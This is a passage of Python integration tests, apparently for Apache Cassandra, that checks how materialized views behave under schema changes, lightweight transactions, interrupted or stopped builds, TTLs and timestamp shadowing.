rows = list(session.execute("SELECT * FROM t_by_v2"))
assert len(rows) == 0, "Expected 0 rows but got {}".format(len(rows))
def test_query_all_new_column(self):
"""
Test that a materialized view created with a 'SELECT *' works as expected when adding a new column
@expected_result The new column is present in the view.
"""
session = self.prepare(user_table=True)
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'"))
assert len(results) == 1
assert hasattr(results[0], 'first_name'), 'Column "first_name" not found'
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, None, 'f', 'ch@ngem3a', None]
)
def test_query_new_column(self):
"""
Test that a materialized view created with 'SELECT <col1, ...>' works as expected when adding a new column
@expected_result The new column is not present in the view.
"""
session = self.prepare(user_table=True)
session.execute(("CREATE MATERIALIZED VIEW users_by_state2 AS SELECT state, username FROM users "
"WHERE STATE IS NOT NULL AND USERNAME IS NOT NULL PRIMARY KEY (state, username)"))
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
session.execute("ALTER TABLE users ADD first_name varchar;")
results = list(session.execute("SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'"))
assert len(results) == 1
assert not hasattr(results[0], 'first_name'), 'Column "first_name" found in view'
assert_one(
session,
"SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1']
)
def test_rename_column(self):
"""
Test that a materialized view created with a 'SELECT *' works as expected when renaming a column
@expected_result The column is also renamed in the view.
"""
session = self.prepare(user_table=True)
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
session.execute("ALTER TABLE users RENAME username TO user")
results = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND user = 'user1'"))
assert len(results) == 1
assert hasattr(results[0], 'user'), 'Column "user" not found'
assert_one(
session,
"SELECT state, user, birth_year, gender FROM users_by_state WHERE state = 'TX' AND user = 'user1'",
['TX', 'user1', 1968, 'f']
)
def test_rename_column_atomicity(self):
"""
Test that column renaming is atomically done between a table and its materialized views
@jira_ticket CASSANDRA-12952
"""
session = self.prepare(nodes=1, user_table=True, install_byteman=True)
node = self.cluster.nodelist()[0]
self._insert_data(session)
assert_one(
session,
"SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
# Rename a column with an injected byteman rule to kill the node after the first schema update
self.fixture_dtest_setup.allow_log_errors = True
script_version = '4x' if self.cluster.version() >= '4' else '3x'
node.byteman_submit([mk_bman_path('merge_schema_failure_{}.btm'.format(script_version))])
with pytest.raises(NoHostAvailable):
session.execute("ALTER TABLE users RENAME username TO user")
logger.debug('Restarting node')
node.stop()
node.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)
# Both the table and its view should have the new schema after restart
assert_one(
session,
"SELECT * FROM ks.users WHERE state = 'TX' AND user = 'user1' ALLOW FILTERING",
['user1', 1968, 'f', 'ch@ngem3a', None, 'TX']
)
assert_one(
session,
"SELECT * FROM ks.users_by_state WHERE state = 'TX' AND user = 'user1'",
['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
)
def test_lwt(self):
"""Test that lightweight transaction behave properly with a materialized view"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Inserting initial data using IF NOT EXISTS")
for i in range(1000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
self._replay_batchlogs()
logger.debug("All rows should have been inserted")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug("Tyring to UpInsert data with a different value using IF NOT EXISTS")
for i in range(1000):
v = i * 2
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({id}, {v}, 'a', 3.0) IF NOT EXISTS".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("No rows should have changed")
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug("Update the 10 first rows with a different value")
for i in range(1000):
v = i + 2000
session.execute(
"UPDATE t SET v={v} WHERE id = {id} IF v < 10".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("Verify that only the 10 first rows changed.")
results = list(session.execute("SELECT * FROM t_by_v;"))
assert len(results) == 1000
for i in range(1000):
v = i + 2000 if i < 10 else i
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(v),
[v, i, 'a', 3.0]
)
logger.debug("Deleting the first 10 rows")
for i in range(1000):
v = i + 2000
session.execute(
"DELETE FROM t WHERE id = {id} IF v = {v} ".format(id=i, v=v)
)
self._replay_batchlogs()
logger.debug("Verify that only the 10 first rows have been deleted.")
results = list(session.execute("SELECT * FROM t_by_v;"))
assert len(results) == 990
for i in range(10, 1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
def test_interrupt_build_process(self):
"""Test that an interrupted MV build process is resumed as it should"""
options = {'hinted_handoff_enabled': False}
if self.cluster.version() >= '4':
options['concurrent_materialized_view_builders'] = 4
session = self.prepare(options=options, install_byteman=True)
node1, node2, node3 = self.cluster.nodelist()
logger.debug("Avoid premature MV build finalization with byteman")
for node in self.cluster.nodelist():
if self.cluster.version() >= '4':
node.byteman_submit([mk_bman_path('4.0/skip_view_build_finalization.btm')])
node.byteman_submit([mk_bman_path('4.0/skip_view_build_task_finalization.btm')])
else:
node.byteman_submit([mk_bman_path('pre4.0/skip_finish_view_build_status.btm')])
node.byteman_submit([mk_bman_path('pre4.0/skip_view_build_update_distributed.btm')])
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
logger.debug("Inserting initial data")
for i in range(10000):
session.execute(
"INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
)
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stop the cluster. Interrupt the MV build process.")
self.cluster.stop()
logger.debug("Checking logs to verify that the view build tasks have been created")
for node in self.cluster.nodelist():
assert node.grep_log('Starting new view build', filename='debug.log')
assert not node.grep_log('Resuming view build', filename='debug.log')
node.mark_log(filename='debug.log')
logger.debug("Restart the cluster")
self.cluster.start()
session = self.patient_cql_connection(node1)
session.execute("USE ks")
logger.debug("MV shouldn't be built yet.")
assert len(list(session.execute("SELECT COUNT(*) FROM t_by_v"))) != 10000
logger.debug("Wait and ensure the MV build resumed. Waiting up to 2 minutes.")
self._wait_for_view("ks", "t_by_v")
logger.debug("Verify all data")
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [10000])
for i in range(10000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0],
cl=ConsistencyLevel.ALL
)
logger.debug("Checking logs to verify that some view build tasks have been resumed")
for node in self.cluster.nodelist():
assert node.grep_log('Resuming view build', filename='debug.log')
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('4.0')
def test_drop_while_building(self):
"""Test that a parallel MV build is interrupted when the view is removed"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in self.cluster.nodelist():
node.byteman_submit([mk_bman_path('4.0/view_builder_task_sleep.btm')])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Drop the MV while it is still building")
session.execute("DROP MATERIALIZED VIEW t_by_v")
logger.debug("Verify that the build has been stopped before its finalization without errors")
for node in self.cluster.nodelist():
self.check_logs_for_errors()
assert not node.grep_log('Marking view', filename='debug.log')
assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')
logger.debug("Verify that the view has been removed")
failed = False
try:
session.execute("SELECT COUNT(*) FROM t_by_v")
except InvalidRequest:
failed = True
self.assertTrue(failed, "The view shouldn't be queryable")
self._assert_view_meta(session, views=1, exists=False)
logger.debug("Create the MV again")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_drop_with_stopped_build(self):
"""Test that MV whose build has been stopped with `nodetool stop` can be dropped"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
nodes = self.cluster.nodelist()
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in nodes:
node.byteman_submit([mk_bman_path('4.0/view_builder_task_sleep.btm')])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stopping all running view build tasks with nodetool")
for node in nodes:
node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
node.nodetool('stop VIEW_BUILD')
logger.debug("Checking logs to verify that some view build tasks have been stopped")
for node in nodes:
node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
self.check_logs_for_errors()
logger.debug("Drop the MV while it is still building")
session.execute("DROP MATERIALIZED VIEW t_by_v")
logger.debug("Verify that the build has been stopped before its finalization without errors")
for node in nodes:
self.check_logs_for_errors()
assert not node.grep_log('Marking view', filename='debug.log')
assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')
logger.debug("Verify that the view has been removed")
failed = False
try:
session.execute("SELECT COUNT(*) FROM t_by_v")
except InvalidRequest:
failed = True
assert failed, "The view shouldn't be queryable"
logger.debug("Create the MV again")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
# The original byteman delay it's still there and can make this flaky CASSANDRA-16962
for i in range(10):
try:
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
except AssertionError:
time.sleep(1)
else:
break
assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_resume_stopped_build(self):
"""Test that MV builds stopped with `nodetool stop` are resumed after restart"""
session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
nodes = self.cluster.nodelist()
logger.debug("Inserting initial data")
for i in range(5000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))
logger.debug("Slowing down MV build with byteman")
for node in nodes:
node.byteman_submit([mk_bman_path('4.0/view_builder_task_sleep.btm')])
logger.debug("Create a MV")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)
logger.debug("Stopping all running view build tasks with nodetool")
for node in nodes:
node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
node.nodetool('stop VIEW_BUILD')
logger.debug("Checking logs to verify that some view build tasks have been stopped")
for node in nodes:
node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
node.watch_log_for('Interrupted build for view', filename='debug.log', timeout=120)
assert not node.grep_log('Marking view', filename='debug.log')
self.check_logs_for_errors()
logger.debug("Check that MV shouldn't be built yet.")
assert len(list(session.execute("SELECT COUNT(*) FROM t_by_v"))) != 5000
logger.debug("Restart the cluster")
self.cluster.stop()
marks = [node.mark_log() for node in nodes]
self.cluster.start()
session = self.patient_cql_connection(nodes[0])
logger.debug("Verify that the MV has been successfully created")
self._wait_for_view('ks', 't_by_v')
assert_one(session, "SELECT COUNT(*) FROM ks.t_by_v", [5000])
logger.debug("Checking logs to verify that the view build has been resumed and completed after restart")
for node, mark in zip(nodes, marks):
assert node.grep_log('Resuming view build', filename='debug.log', from_mark=mark)
assert node.grep_log('Marking view', filename='debug.log', from_mark=mark)
self.check_logs_for_errors()
@since('3.0')
def test_mv_with_default_ttl_with_flush(self):
self._test_mv_with_default_ttl(True)
@since('3.0')
def test_mv_with_default_ttl_without_flush(self):
self._test_mv_with_default_ttl(False)
def _test_mv_with_default_ttl(self, flush):
"""
Verify mv with default_time_to_live can be deleted properly using expired livenessInfo
@jira_ticket CASSANDRA-14071
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
logger.debug("MV with same key and unselected columns")
session.execute("CREATE TABLE t2 (k int, a int, b int, c int, primary key(k, a)) with default_time_to_live=600")
session.execute(("CREATE MATERIALIZED VIEW mv2 AS SELECT k,a,b FROM t2 "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (a, k)"))
session.cluster.control_connection.wait_for_schema_agreement()
self.update_view(session, "UPDATE t2 SET c=1 WHERE k=1 AND a=1;", flush)
assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 1])
assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])
self.update_view(session, "UPDATE t2 SET c=null WHERE k=1 AND a=1;", flush)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
self.update_view(session, "UPDATE t2 SET c=2 WHERE k=1 AND a=1;", flush)
assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 2])
assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])
self.update_view(session, "DELETE c FROM t2 WHERE k=1 AND a=1;", flush)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
if flush:
self.cluster.compact()
assert_none(session, "SELECT * FROM t2")
assert_none(session, "SELECT * FROM mv2")
# test with user-provided ttl
self.update_view(session, "INSERT INTO t2(k,a,b,c) VALUES(2,2,2,2) USING TTL 5", flush)
self.update_view(session, "UPDATE t2 USING TTL 100 SET c=1 WHERE k=2 AND a=2;", flush)
self.update_view(session, "UPDATE t2 USING TTL 50 SET c=2 WHERE k=2 AND a=2;", flush)
self.update_view(session, "DELETE c FROM t2 WHERE k=2 AND a=2;", flush)
time.sleep(5)
assert_none(session, "SELECT k,a,b,c FROM t2")
assert_none(session, "SELECT k,a,b FROM mv2")
if flush:
self.cluster.compact()
assert_none(session, "SELECT * FROM t2")
assert_none(session, "SELECT * FROM mv2")
logger.debug("MV with extra key")
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int) with default_time_to_live=600")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1])
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 2, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 2, 1])
assert_one(session, "SELECT * FROM mv", [1, 2, 1])
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 3, 1);", flush)
assert_one(session, "SELECT * FROM t", [1, 3, 1])
assert_one(session, "SELECT * FROM mv", [1, 3, 1])
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t", [1, 3, 1])
assert_one(session, "SELECT * FROM mv", [1, 3, 1])
# user provided ttl
self.update_view(session, "UPDATE t USING TTL 50 SET a = 4 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 4, 1])
assert_one(session, "SELECT * FROM mv", [1, 4, 1])
self.update_view(session, "UPDATE t USING TTL 40 SET a = 5 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 5, 1])
assert_one(session, "SELECT * FROM mv", [1, 5, 1])
self.update_view(session, "UPDATE t USING TTL 30 SET a = 6 WHERE k = 1", flush)
assert_one(session, "SELECT * FROM t", [1, 6, 1])
assert_one(session, "SELECT * FROM mv", [1, 6, 1])
if flush:
self.cluster.compact()
assert_one(session, "SELECT * FROM t", [1, 6, 1])
assert_one(session, "SELECT * FROM mv", [1, 6, 1])
@flaky
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_with_flush(self):
self._test_no_base_column_in_view_pk_complex_timestamp(flush=True)
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_without_flush(self):
self._test_no_base_column_in_view_pk_complex_timestamp(flush=False)
def _test_no_base_column_in_view_pk_complex_timestamp(self, flush):
"""
Able to shadow old view row if all columns in base are removed including unselected
Able to recreate view row if at least one selected column alive
@jira_ticket CASSANDRA-11500
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT k,c,a,b FROM t "
"WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c, k)"))
session.cluster.control_connection.wait_for_schema_agreement()
# update unselected, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 1 SET e=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, 1, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, add selected column, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])
# remove selected column, view row is removed
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# update unselected with ts=3, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# insert livenesssInfo, view row should be alive
self.update_view(session, "INSERT INTO t(k,c) VALUES(1,1) USING TIMESTAMP 3", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, view row should be alive because of base livenessInfo alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=null WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# add selected column, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# update unselected, view row should be alive
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# delete with ts=3, view row should be alive due to unselected@ts4
self.update_view(session, "DELETE FROM t USING TIMESTAMP 3 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
# remove unselected, view row should be removed
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# add selected with ts=7, view row is alive
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])
# remove selected with ts=7, view row is dead
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET b=null WHERE k=1 AND c=1;", flush)
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
# add selected with ts=5, view row is alive (selected column should not affects each other)
self.update_view(session, "UPDATE t USING TIMESTAMP 5 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
# add selected with ttl=20 (we apparently need a long ttl because the flushing etc that self.update_view does can take a long time)
self.update_view(session, "UPDATE t USING TTL 20 SET a=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
time.sleep(20)
# update unselected with ttl=10, view row should be alive
self.update_view(session, "UPDATE t USING TTL 20 SET f=1 WHERE k=1 AND c=1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
time.sleep(20)
# view row still alive due to base livenessInfo
assert_none(session, "SELECT * FROM t")
assert_none(session, "SELECT * FROM mv")
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_with_flush(self):
self._test_base_column_in_view_pk_complex_timestamp(flush=True)
@since('3.0')
def test_base_column_in_view_pk_complex_timestamp_without_flush(self):
self._test_base_column_in_view_pk_complex_timestamp(flush=False)
def _test_base_column_in_view_pk_complex_timestamp(self, flush):
"""
Able to shadow old view row with column ts greater than pk's ts and re-insert the view row
Able to shadow old view row with column ts smaller than pk's ts and re-insert the view row
@jira_ticket CASSANDRA-11500
"""
session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
node1, node2, node3 = self.cluster.nodelist()
session.execute('USE ks')
session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int)")
session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
"WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
session.cluster.control_connection.wait_for_schema_agreement()
# Set initial values TS=1
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 1;", flush)
assert_one(session, "SELECT * FROM t", [1, 1, 1])
assert_one(session, "SELECT * FROM mv", [1, 1, 1])
# increase b ts to 10
self.update_view(session, "UPDATE t USING TIMESTAMP 10 SET b = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET a = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
# switch entries. shadow a = 2, insert a = 1
self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a = 1 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET a = 2 WHERE k = 1;", flush, compact=True)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 2, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 2, 10])
# able to shadow view row even if base-column in view pk's ts is smaller than row timestamp
# set row TS = 20, a@6, b@20
self.update_view(session, "DELETE FROM t USING TIMESTAMP 5 where k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, None, 2, 10])
assert_none(session, "SELECT k,a,b,writetime(b) FROM mv")
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1) USING TIMESTAMP 6;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 2, 10])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 2, 10])
self.update_view(session, "INSERT INTO t (k, b) VALUES (1, 1) USING TIMESTAMP 20;", flush)
assert_one(session, "SELECT k,a,b,writetime(b) FROM t", [1, 1, 1, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
# switch entries. shadow a = 1, insert a = 2
self.update_view(session, "UPDATE t USING TIMESTAMP 7 SET a = 2 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 2, 1, 7, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 2, 1, 20])
# switch entries. shadow a = 2, insert a = 1
self.update_view(session, "UPDATE t USING TIMESTAMP 8 SET a = 1 WHERE k = 1;", flush)
assert_one(session, "SELECT k,a,b,writetime(a),writetime(b) FROM t", [1, 1, 1, 8, 20])
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv", [1, 1, 1, 20])
# create another view row
self.update_view(session, "INSERT INTO t (k, a, b) VALUES (2, 2, 2);", flush)
assert_one(session, "SELECT k,a,b FROM t WHERE k = 2", [2, 2, 2])
assert_one(session, "SELECT k,a,b FROM mv WHERE k = 2", [2, 2, 2])
# stop node2, node3
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
logger.debug('Shutdown node3')
node3.stop(wait_other_notice=True)
# shadow a = 1, create a = 2
query = SimpleStatement("UPDATE t USING TIMESTAMP 9 SET a = 2 WHERE k = 1", consistency_level=ConsistencyLevel.ONE)
self.update_view(session, query, flush)
# shadow (a=2, k=2) after 3 second
query = SimpleStatement("UPDATE t USING TTL 3 SET a = 2 WHERE k = 2", consistency_level=ConsistencyLevel.ONE)
self.update_view(session, query, flush)
logger.debug('Starting node2')
node2.start(wait_for_binary_proto=True)
logger.debug('Starting node3')
node3.start(wait_for_binary_proto=True)
# For k = 1 & a = 1, We should get a digest mismatch of tombstones and repaired
query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 1", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
assert 0 == len(result.current_rows)
# For k = 1 & a = 1, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert_none(session, "SELECT * FROM mv WHERE k = 1 AND a = 1")
assert 0 == len(result.current_rows)
# For k = 1 & a = 2, We should get a digest mismatch of data and repaired for a = 2
query = SimpleStatement("SELECT * FROM mv WHERE k = 1 AND a = 2", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
assert 1 == len(result.current_rows)
# For k = 1 & a = 2, second time no digest mismatch
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert 1 == len(result.current_rows)
assert_one(session, "SELECT k,a,b,writetime(b) FROM mv WHERE k = 1", [1, 2, 1, 20])
time.sleep(3)
# For k = 2 & a = 2, We should get a digest mismatch of expired and repaired
query = SimpleStatement("SELECT * FROM mv WHERE k = 2 AND a = 2", consistency_level=ConsistencyLevel.ALL)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), True)
